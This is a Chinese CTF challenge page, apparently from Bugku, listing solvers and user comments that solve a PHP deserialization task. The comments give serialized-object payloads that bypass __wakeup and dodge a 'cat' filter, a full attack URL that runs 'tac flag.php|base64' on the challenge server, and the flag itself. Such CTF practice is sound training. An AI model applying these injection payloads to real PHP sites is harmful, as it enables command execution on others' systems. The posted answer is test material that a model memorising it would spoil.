评分(3)
解题动态

网络安全亮 攻破了该题 18小时前

souljian03 攻破了该题 2天前

dwx1583 攻破了该题 3天前

hackerbugku 攻破了该题 3天前

zengzhijing 攻破了该题 3天前

王者荣耀 攻破了该题 5天前

maomaoht 攻破了该题 7天前

ahsjezyt 攻破了该题 9天前

千机www 攻破了该题 9天前

MUJOO 攻破了该题 9天前

不吃鸭蛋 攻破了该题 10天前

Da1ly_1upup 攻破了该题 12天前

lzq2000 攻破了该题 12天前

ETERNALBLUE 攻破了该题 13天前

bugkuctfmike6 攻破了该题 15天前

124要留就要77 攻破了该题 15天前

smtall 攻破了该题 19天前

LostDawn 攻破了该题 19天前

yy56 攻破了该题 21天前

评论
不会编程的崽 1年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 1年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 2年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 2年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 2年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 2年前
举报
特别要注意下url编码的问题
泡椒控卫 2年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
追风亚索 2年前
举报
flag{Unser1alize_and_2CE_Add},flag是不是没变
笨笨笨蛋 2年前
举报
只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~